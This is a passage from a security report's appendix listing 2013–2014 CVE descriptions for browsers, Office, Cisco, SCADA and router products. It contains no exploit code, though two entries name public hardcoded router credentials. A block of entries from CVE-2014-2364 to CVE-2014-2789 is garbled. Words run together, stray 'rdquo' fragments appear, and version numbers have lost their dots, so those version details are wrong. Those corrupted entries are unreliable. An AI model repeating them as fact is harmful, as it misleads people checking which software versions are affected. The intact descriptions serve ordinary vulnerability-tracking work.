CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster Page 20 of 28

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx

CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418

CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element

CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors

CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo

CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo

CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster. Page 24 of 28

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

